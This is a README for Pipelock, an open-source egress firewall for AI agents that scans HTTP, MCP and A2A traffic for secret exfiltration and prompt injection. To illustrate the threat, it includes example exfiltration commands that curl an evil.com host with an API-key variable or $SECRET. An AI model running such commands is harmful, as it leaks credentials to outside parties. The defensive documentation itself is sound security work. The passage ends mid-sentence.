Pipelock sits between AI agents and the network. It inspects mediated HTTP, WebSocket, MCP, and A2A traffic, plus CONNECT tunnel contents when TLS interception is enabled, for secret exfiltration, prompt injection, SSRF, tool poisoning, and risky tool-call chains. Plain CONNECT without interception is scanned at the hostname and URL level.

Pipelock emits mediator-signed action receipts over content-aware boundary decisions, so a reviewer can verify what Pipelock decided outside the agent runtime. The public agent-egress-bench corpus exercises the detections. Learn more: Open-source AI firewall.

Works with: Claude Code · OpenAI Codex · Cline · OpenCode · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph


The Problem

Your AI agent has $PROVIDER_API_KEY in its environment, plus shell access. One request can leak it:

curl "https://evil.com/steal?key=$PROVIDER_API_KEY"   # game over, unless pipelock is watching

Every machine action your agent takes should cross a boundary between your secrets and the open internet. Pipelock becomes that boundary when the agent is routed through its proxy, MCP wrapper, sandbox, host containment model, or cluster deployment topology. It scans mediated outbound and inbound traffic, blocks or flags attacks based on mode, and records signed evidence of the decision.


Verify It Yourself

Most agent-security tools ask you to trust their dashboard. Pipelock hands you a signed receipt and lets you check it yourself, offline, with a key you hold. No account and no server.

The built-in demo fires real attack scenarios, blocks them, and writes signed receipts plus the public key to disk with no config and no network:

pipelock demo --receipts-dir ./out                                   # runs attack scenarios, writes 7 signed receipts + signer.pub
pipelock verify-receipt "$(ls ./out/*.json | head -1)" --key ./out/signer.pub  # check a signature yourself (each receipt is <action-id>.json)

The scorecard grades each claim on its own and states what it does not prove: whether anything happened outside the boundary Pipelock mediates. Below it, the receipt timeline lists the recorded mediated decisions with their verdicts and hash links. A receipt that is honest about its own limits beats a green checkmark that hides them.

The evidence viewer is free and needs no license:

pipelock evidence serve --receipt-dir ./out   # read-only HTML report for one recorded session
pipelock evidence view --receipt-dir ./out    # static offline report, no server

Two honesty notes, stated up front. The demo signs with an ephemeral key it prints for the run, which proves the receipts are self-consistent rather than tied to a named identity. The public Pipelock playground is a separate path that verifies against a key Pipelock publishes. And the operator running Pipelock holds the signing key, so a receipt proves what the boundary decided and that the key holder signed it, not that the operator is honest. pipelock anchor receipts records receipt-chain checkpoints to a local backend or a Rekor transparency log for later audit, and operator-independent verification against that anchor is still being proven end to end.

The full argument for why proof beats promises is in demonstration over attestation.


Quick Start

# Install from source (Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

# Set up local agent integrations and generate a config
pipelock init

# Test the scanner
pipelock check --url "https://evil.com/?k=AKIAIOSFODNN7EXAMPLE"  # blocked: AWS Access ID
pipelock check --url "https://docs.python.org/3/"                # allowed
# Download a binary
# See https://github.com/luckyPipewrench/pipelock/releases

# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# Homebrew on macOS
brew install luckyPipewrench/tap/pipelock
gh attestation verify pipelock_3.2.0_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:v3.2.0 --owner luckyPipewrench

Release workflows publish SLSA provenance, CycloneDX SBOMs, checksums, and signed container images. Source builds with go install produce a Community-only binary; pre-built release artifacts include paid-tier code that activates with a valid license key.


See It In Action

The Pro/Enterprise operator dashboard (pipelock dashboard serve) is a read-only console over signed evidence. It supports token, OIDC, or mTLS authentication; bounded RBAC permissions; redacted metadata views; raw-view elevation; exemption lifecycle records; backup and restore; coverage certificates; and fleet views. It is present in enterprise-tagged builds and release artifacts with the required license feature.

The free single-session evidence viewer shown above is separate. It needs no license and has no cross-agent enumeration.

pipelock report --input events.jsonl generates HTML, JSON, or signed bundle reports with risk rating, timeline, event categories, and an evidence appendix. The free Prometheus and Grafana path monitors one Pipelock instance and is distinct from the Enterprise Conductor fleet control plane.


What It Catches

Measured against a public, reproducible benchmark

agent-egress-bench runs a corpus of agent-exfiltration and prompt-injection attacks against Pipelock, or against any other tool. The numbers come from a run anyone can repeat, not a claim.

See the live results · Run it yourself

Pipelock runs in three modes:

Mode Security Web Browsing Use Case
strict Allowlist-only None Regulated industries, high-security
balanced Blocks naive + detects sophisticated Via fetch or forward proxy Most developers (default)
audit Logging only Unrestricted Evaluation before enforcement

For agents running uncensored or abliterated models, the hostile-model preset layers defenses on strict mode: aggressive entropy thresholds, blanket network-tool blocking, session binding, cross-request exfiltration detection, and a pre-configured kill switch. pipelock audit recommends this preset when it detects known guardrail-removal toolchains through dependency signals.

Attack Vector Strict Balanced Audit
curl evil.com -d $SECRET Prevented Prevented Logged
Secret in URL query params Prevented Detected by DLP Logged
Base64-encoded secret in URL Prevented Detected by entropy and decoded DLP Logged
DNS tunneling Prevented Detected by subdomain entropy Logged
Chunked exfiltration Prevented Detected by rate, budget, and fragment checks Logged
Public-key encrypted blob in URL Prevented Logged when entropy flags it Logged

Honest assessment: Strict mode blocks outbound HTTP that traverses Pipelock except allowlisted API domains, so there is no exfiltration channel through the proxy itself. Balanced mode raises the bar from "one curl command" to "sophisticated pre-planned attack." Audit mode gives you visibility you don't have today. With the sandbox enabled (pipelock sandbox) or the host/cluster containment topology enforced, Pipelock adds an OS or deployment boundary on top of content inspection. Direct egress still has to be blocked by that boundary for non-cooperative tools that ignore proxy settings.

Comparison

Pipelock Scanners (agent-scan) Sandboxes (srt) Kernel agents (agentsh)
Secret exfiltration prevention Strict blocks; balanced detects Partial (proxy mode) Partial (domain-level) Yes
DLP + entropy analysis Yes No No Partial
Prompt injection detection Yes Yes No No
MCP scanning (bidirectional + tool poisoning) Yes Yes No No
WebSocket proxy (frame scanning) Yes No No No
MCP HTTP transport (Streamable HTTP) Yes No No No
Emergency kill switch (6 sources) Yes No No No
Tool call chain detection Yes No No No
Process sandbox (no Docker) Yes No No Yes (kernel-level)
Single binary, zero deps Yes No (Python) No (npm) No (kernel)

Reference matrix: docs/comparison.md

Canonical comparison hub: AI runtime security comparison

Threat Coverage
ASI01 Agent Goal Hijack Strong: bidirectional MCP + response scanning
ASI02 Tool Misuse Partial: proxy as controlled tool, MCP scanning
ASI03 Identity & Privilege Abuse Strong: capability separation + SSRF protection
ASI04 Supply Chain Vulnerabilities Partial: integrity monitoring + MCP scanning
ASI05 Unexpected Code Execution Moderate: HITL approval, fail-closed defaults
ASI06 Memory & Context Poisoning Moderate: injection detection + session taint propagation
ASI07 Insecure Inter-Agent Communication Partial: MCP/A2A scanning, agent ID, integrity, signing
ASI08 Cascading Failures Moderate: fail-closed architecture, rate limiting
ASI09 Human-Agent Trust Exploitation Partial: HITL modes, audit logging
ASI10 Rogue Agents Strong: domain allowlist + rate limiting + capability separation

Details, config examples, and gap analysis: docs/owasp-mapping.md


What It Does

Pipelock is an AI egress proxy and MCP security control. It sits inline between your AI agent and the network, scans outbound and inbound traffic, and emits signed receipts plus mediation metadata for attestation outside the agent runtime. AARP/SVID workload-identity appraisal is verifier-side today: the proxy and MCP runtimes do not consume SVID evidence in live allow/deny decisions or bind receipt actor identity from an X.509-SVID.

Detection And Scanning

  • Ordered URL scanner pipeline: URL length and parsing checks, scheme validation, CRLF and path-traversal detection, allowlist and blocklist policy, immutable literal-IP SSRF and core-DLP floors, configured DLP, path and subdomain entropy analysis, DNS SSRF and rebinding protection, per-domain rate limits, data budgets, and final context checks. DLP runs before DNS resolution, so secrets are caught before a DNS query leaves the proxy. See docs/bypass-resistance.md.
  • DLP: 65 built-in patterns for API keys, tokens, credentials, cryptocurrency keys, environment secrets, and financial identifiers with checksum validation. BIP-39 seed phrase detection uses dictionary lookup, sliding windows, and SHA-256 checksum validation.
  • Response scanning: 32 built-in prompt-injection and state/control poisoning patterns, plus 6-pass normalization for zero-width characters, homoglyphs, leetspeak, optional whitespace, vowel folding, base64, and hex. Actions are block, strip, warn, or ask.
  • Streaming SSE: text/event-stream responses from LLM gateways and MCP HTTP/SSE flow token by token with per-event and rolling cross-event DLP and injection scanning. A detection terminates the stream fail-closed. See SSE streaming guide.
  • Request body scanning: headers and bodies are scanned before they leave the protected path across JSON, form data, raw text, reverse proxy requests, TLS-intercepted CONNECT traffic, and outbound WebSocket client frames.
  • Request redaction: optional JSON rewriting replaces matched secret values with typed placeholders such as <pl:aws-access-key:1> across HTTP, WebSocket, and MCP tools/call arguments. Receipts record the active profile and per-class counts instead of plaintext secrets.
  • Address protection: ETH, BTC, SOL, and BNB address validation catches lookalike destination swaps using prefix/suffix fingerprinting and an operator allowlist.
  • Explainable findings: pipelock explain <url> (also explain event <id> and explain mcp) prints the scanner, layer, matching rule, inspected surface, and the narrowest available config knob for a false positive. See docs/cli/explain.md.
  • Canary tokens: pipelock canary generates honeytoken config. A synthetic secret showing up in outbound traffic proves an agent or something in its chain is exfiltrating environment variables. See canary tokens.
  • Skill-file scanning: pipelock skill-scan inventories agent skill files, compares them to an operator-owned lock file, and flags source-to-sink combinations such as credential-to-network-sink or shell-to-write with line evidence before anything runs. See docs/cli/skill-scan.md.

MCP Security

Pipelock wraps MCP servers with bidirectional scanning:

# Wrap a local MCP server over stdio
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

# Bridge a stdio client to a remote Streamable HTTP server
pipelock mcp proxy --upstream http://localhost:8080/mcp

# Run the HTTP proxy and an MCP HTTP listener together
pipelock run --config pipelock.yaml --mcp-listen 127.0.0.1:8889 --mcp-upstream http://localhost:3000/mcp
  • Input scanning: MCP client requests are checked for DLP leaks and injection in tool arguments.
  • Response scanning: server responses are scanned before the agent sees them.
  • Tool poisoning: tools/list descriptions are checked for hidden instructions and mid-session rug-pull changes.
  • Tool policy: 17 built-in rules block destructive file deletes, credential access, reverse shells, persistence mechanisms, encoded command execution, and related high-risk tool calls before execution.
  • Tool call chains: 10 built-in category-axis patterns detect reconnaissance, credential theft, data staging, persistence, exfiltration, and callback chains with configurable gap tolerance.
  • A2A inspection: Google Agent-to-Agent protocol traffic is inspected on the forward and MCP paths; Pipelock is not a standalone A2A proxy.
  • Authenticated MCP HTTP listeners (v3.2.0): non-loopback MCP listeners fail closed by default and require --mcp-auth-token-file, or an explicit --mcp-allow-unauthenticated for network-policy-isolated deployments. Tokenless loopback listeners reject DNS-rebound and wrong-port Host authorities and scrub listener credentials from headers.

Containment

Unprivileged process containment uses OS-native primitives. Linux uses Landlock, seccomp, and network namespaces. macOS uses sandbox-exec profiles. In containers, --best-effort keeps Landlock and seccomp when namespace creation is restricted, while network scanning uses proxy-based routing.

pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server

Host containment goes further on Linux:

pipelock contain install
pipelock contain verify
pipelock contain run -- claude-code

pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh manages a 3-UID operator / proxy / agent model with nftables owner-match routing, systemd service setup, wrapper commands, workspace ACLs, CA refresh, and posture evidence. See docs/contain-cli.md.

Evidence And Receipts

  • Flight recorder: hash-chained JSONL evidence log with Ed25519-signed checkpoints and DLP redaction. pipelock init provisions a recorder directory and signing key for stock installs, while the recorder stays inert until a directory and key exist. See Flight Recorder.
  • Action receipts: signed records emitted for mediated actions, carrying verdict, policy hash, transport, and scanner layer. Blocks produce receipts; allow-path receipt enforcement requires flight_recorder.require_receipts. Verify with pipelock verify-receipt --key <signer.pub>. Unpinned runs are structural-only and exit non-zero unless --allow-unpinned is passed.
  • Mediation envelope: RFC 8941 sideband metadata on forwarded HTTP requests and MCP _meta, with action type, verdict, actor identity, policy hash, taint context, and receipt correlation ID. See federation guide.
  • Receipt conformance: four independent cross-language verifier implementations (Go, TypeScript, Rust, and Python) run against one shared conformance corpus, including malformed and forgeable inputs such as duplicate keys, integer overflow, and unpaired surrogates. A browser wasm surface reuses the Go verifier implementation. AARP/SVID appraisal remains an offline verifier profile, not runtime identity enforcement.
  • Anchors: pipelock anchor receipts records receipt-chain checkpoints to a local backend or Rekor. Rekor anchoring is proof material for later audit; Rekor verification requires pinned log keys and the end-to-end operator-independence path is still being proven.
  • Posture capsule: pipelock posture emit and pipelock posture verify produce and check a signed snapshot of a deployment's enforcement posture, with a CI gate and scoring model, so a reviewer can confirm the boundary was configured the way it claims.

Fleet And Enterprise

  • Operator dashboard: pipelock dashboard serve is a read-only console over signed evidence. Pro unlocks the Overview, Evidence, Exemptions, Agents, Budgets, and Trust & Keys views; Enterprise adds the Fleet, Workbench, and Incident views. See docs/cli/dashboard.md.
  • Free evidence viewer: pipelock evidence serve and pipelock evidence view render one selected recorder session without a license or cross-agent enumeration. pipelock evidence verify-cert verifies Pro-issued coverage certificates offline.
  • Conductor: Enterprise fleet control plane for signed policy-bundle distribution, signed evidence sink (pipelock fleet-sink), enrollment, remote kill, rollback, dry-run, decision replay, and runtime/apply-state drift preflight over mTLS/SPIFFE. Followers enforce locally; the default stale-policy mode engages an independent deny source after its grace window, while the documented continue_last_known_good override weakens that posture. Conductor holds no agent secrets. See the Conductor guide.
  • Legal hold: pipelock dashboard legal-hold add/list/release manages preservation holds as compliance metadata kept outside the dashboard's HTTP authority, so a compromised dashboard can read holds but never forge or delete them.
  • Behavioral baseline: profile-then-lock for MCP tool behavior with pipelock baseline list/show/ratify/forget for operator approval and relearning. See docs/cli/baseline.md.

Operability

  • Kill switch: six independent activation sources: config file, remote API, SIGUSR1, sentinel file, Conductor remote kill, and stale-bundle detection. Any one active source blocks traffic, with endpoint and IP exemptions in the controller.
  • Scan API: programmatic scanning for url, dlp, prompt_injection, and tool_call verdicts with bearer token auth, per-token rate limiting, structured findings, and Prometheus metrics. See docs/scan-api.md.
  • Filesystem sentinel: watches agent working directories for secrets written to disk and attributes writes to the MCP subprocess lineage on Linux. See docs/guides/filesystem-sentinel.md.
  • Event emission: forwards audit events to SIEMs, webhook receivers, syslog, CEF, OTLP, and metrics outputs without blocking the proxy hot path. See docs/guides/siem-integration.md.
  • Security assessment: pipelock assess init, pipelock assess run, and pipelock assess finalize orchestrate attack simulation, config scoring, install verification, and MCP discovery into a reproducible evidence bundle. Critical exposures such as unprotected MCP servers cap the grade regardless of numeric score. The free summary shows your grade, section scores, and top findings; a license unlocks the full report with server-specific findings, remediation commands, and Ed25519-signed evidence.
Feature What It Does
Audit Reports pipelock report --input events.jsonl generates HTML/JSON/bundle reports with risk rating, timeline, and evidence appendix. Ed25519 signing with --sign. (Sample report)
Diagnose pipelock diagnose runs 7 local checks to verify your config end to end with no network.
Enforcement Doctor (v2.5) pipelock doctor reports configured-vs-enforceable status for proxying, TLS interception, request-body scanning, Browser Shield, MCP wrapping, MCP binary integrity, tool provenance, file_sentry, Sentry, and deployment-boundary signals.
Request Body Injection Blocking (v2.5) Request-body prompt-injection and critical-DLP findings hard-block non-provider destinations in enforce mode across forward, reverse, TLS-intercept, and WebSocket transports, with block-reason headers for operator-visible diagnosis.
Request Policy (v2.6) Allow-by-default deny/warn rails on outbound API operations: match route plus GraphQL operation predicates, recurse into JSON $batch envelopes, fail closed on unparseable or opaque bodies, and run before the contract gate. See the request policy guide.
TLS Interception Optional CONNECT tunnel MITM: decrypt, scan bodies/headers/responses, re-encrypt. pipelock tls init generates a CA, then pipelock tls install-ca prints platform trust-store install steps.
Block Hints Opt-in explain_blocks: true adds fix suggestions to blocked responses.
Project Audit pipelock audit ./project scans for security risks and generates a tailored config.
Config Scoring (v2.6) pipelock audit score --config pipelock.yaml evaluates security posture across 23 categories with a 170-point budget and letter grade.
File Integrity SHA256 manifests detect modified, added, or removed workspace files.
Git Protection git diff | pipelock git scan-diff catches secrets before commit.
Ed25519 Signing Key management, file signing, and signature verification for multi-agent trust.
Session Profiling Per-session behavioral analysis for domain bursts and volume spikes.
Adaptive Enforcement Per-session threat score with escalation from warn to block, de-escalation timers, and domain burst detection.
Adaptive Operator CLI (v2.5) pipelock adaptive status / flush / whoami exposes runtime adaptive state through the authenticated admin API. See docs/cli/adaptive.md.
Finding Suppression Silence known false positives through config rules or inline pipelock:ignore comments.
Multi-Agent Support Agent identification through X-Pipelock-Agent header for per-agent filtering.
Fleet Monitoring Per-instance Prometheus metrics plus ready-to-import Grafana dashboard. Free single-instance monitoring, distinct from Conductor.
Operator Dashboard (v3.1, Pro/Enterprise) pipelock dashboard serve gives read-only Overview, Evidence, Exemptions, Agents, Budgets, Trust & Keys, Fleet, Workbench, and Incident views with token, OIDC, or mTLS auth, bounded RBAC, raw-view elevation, backup/restore, exemption lifecycle records, and coverage certificates. See docs/cli/dashboard.md.
Free Evidence Viewer (v3.1) pipelock evidence serve serves one selected recorder session as a read-only HTML report without a license and without cross-agent enumeration. pipelock evidence verify-cert verifies Pro-issued coverage certificates offline.
Conductor: fleet control plane (v2.7, Enterprise) Signed policy-bundle distribution, signed-evidence audit sink (pipelock fleet-sink), enrollment, remote kill, policy rollback, dry-run, decision replay, and runtime/apply-state drift preflight over mTLS/SPIFFE. Gated by the fleet license feature; stale-policy behavior is explicit and defaults to strict deny. See the Conductor guide.
A2A Scanning Agent Card poisoning detection, card drift monitoring, and session smuggling prevention for Google's Agent-to-Agent protocol on forward/MCP paths.
Behavioral Baseline Profile-then-lock for MCP tool behavior with pipelock baseline list/show/ratify/forget for operator approval and relearning. See docs/cli/baseline.md.
Denial-of-Wallet Per-agent budgets for retries, fan-out, and concurrent tool calls.
Taint Escalation Exposure-based policy escalation across MCP and task boundaries until trust is restored.
Mediation Envelope RFC 8941 sideband metadata on forwarded HTTP requests and MCP _meta, with inbound verification, replay protection, SPIFFE actor format, and an RFC 9421 signing-key directory. See federation guide.
Receipt Conformance Cross-implementation receipt verification suite (sdk/conformance/) across independent Go, TypeScript, Rust, and Python implementations, plus a browser wasm surface backed by Go. EvidenceReceipt v2 uses RFC 8785/JCS canonicalization. AARP/SVID appraisal remains offline verifier-side.
Learn-and-Lock (v2.4) Per-agent behavioral contracts: observe traffic, compile a signed candidate contract, replay captured observations in shadow, ratify per rule, promote the signed active manifest, and enforce live on URL-bearing transports plus MCP tool calls. See learn-and-lock guide.
Block-Reason Header (v2.4) X-Pipelock-Block-Reason on HTTP-capable block paths, with the same reason vocabulary on MCP JSON-RPC error metadata. See block-reason header.
Wedge-Detection Watchdog (v2.4) health_watchdog returns /health 503 when a subsystem heartbeat goes stale. See health endpoint guide.
Redaction Provider Plugin Shape (v2.4) First-party redaction parsers for Anthropic, OpenAI, and Gemini chat APIs, with a provider-plugin shape for third-party parsers.
Audit Packet v0 Schema + Verifiers (v2.5) First-party canonical Audit Packet schema with Go, TypeScript, and Rust verifier implementations, plus standalone pipelock-verifier CLI. Schema lives under sdk/audit-packet/; verifier packages live under sdk/verifiers/.
Host Containment Lifecycle (v2.5) pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh manages the 3-UID containment model. See docs/contain-cli.md.
MCP Integrity Manifests (v2.5) pipelock mcp integrity manifest generate / verify / sign / verify-signature pins MCP server binaries/scripts by hash and can require a trusted manifest signature before subprocess launch. See docs/cli/mcp-integrity.md.
Kubernetes MCP Launcher Contract (v2.5) pipelock init sidecar --mcp-upstream emits companion listener configuration, service port, workload annotations, NetworkPolicy allowance, PIPELOCK_MCP_PROXY_URL, and mounted PIPELOCK_MCP_CONFIG. See docs/cli/init-sidecar.md.
Federation Strict Mode (v2.5) Inbound mediation-envelope verification requires SPIFFE-format actors by default, contract tombstones are enforced, and pipelock envelope trust add/list/remove/verify manages local trust. See federation guide.
Media Policy Strips steganographic metadata from JPEG/PNG, rejects audio/video by default, hardens SVG active content, and enforces image size limits. See Media Policy.
Compliance Mappings OWASP MCP Top 10, OWASP Agentic Top 15, OWASP LLM Top 10, NIST 800-53, EU AI Act, and procurement/audit mappings.

Free, Pro, and Enterprise

All detection, enforcement, containment, and single-agent evidence is free forever under Apache 2.0. Paid tiers add multi-agent coordination (Pro) and fleet governance plus compliance (Enterprise).

Capability Free Pro Enterprise
Scanning and detection (ordered URL pipeline, DLP, injection, SSRF, streaming SSE, redaction, address protection) Yes Yes Yes
MCP and A2A scanning (input, response, tool policy, tool chain, poisoning, integrity, authenticated listeners) Yes Yes Yes
Containment, sandbox, host contain, 6-source kill switch Yes Yes Yes
Action receipts, flight recorder, anchors, free evidence viewer, verify-cert, standalone verifier Yes Yes Yes
Canary tokens, skill-scan, explain, single-instance Prometheus and Grafana Yes Yes Yes
Per-agent profiles: identity, budgets, config and scanner isolation, per-agent sandbox No Yes Yes
Per-agent routing by source CIDR and network selector No Yes Yes
Operator dashboard: Overview, Evidence, Exemptions, Agents, Budgets, Trust & Keys No Yes Yes
Per-agent coverage certificates No Yes Yes
Legal hold and compliance metadata No Yes Yes
Conductor fleet control plane, fleet-sink audit sink, remote kill, rollback, decision replay, drift preflight No No Yes
mTLS follower enrollment and roster-verified signed policy distribution No No Yes
Dashboard fleet views: Fleet, Workbench, Incident No No Yes

The signed pipelock assess report is a separate assess entitlement, independent of Pro and Enterprise. The free assess grade is unchanged.


How It Works

Pipelock uses capability separation: in an enforced deployment, the agent process has secrets but no direct network access. Pipelock has network access but no agent secrets. Even if the agent gets prompt-injected, it can't reach the firewall's controls.

Three HTTP proxy modes (same port), plus a dedicated MCP proxy and A2A inspection on the forward and MCP paths:

  • Fetch proxy (/fetch?url=...): Fetches the URL, extracts text, scans for injection, returns clean content.
  • Forward proxy (`HTTPS_PROX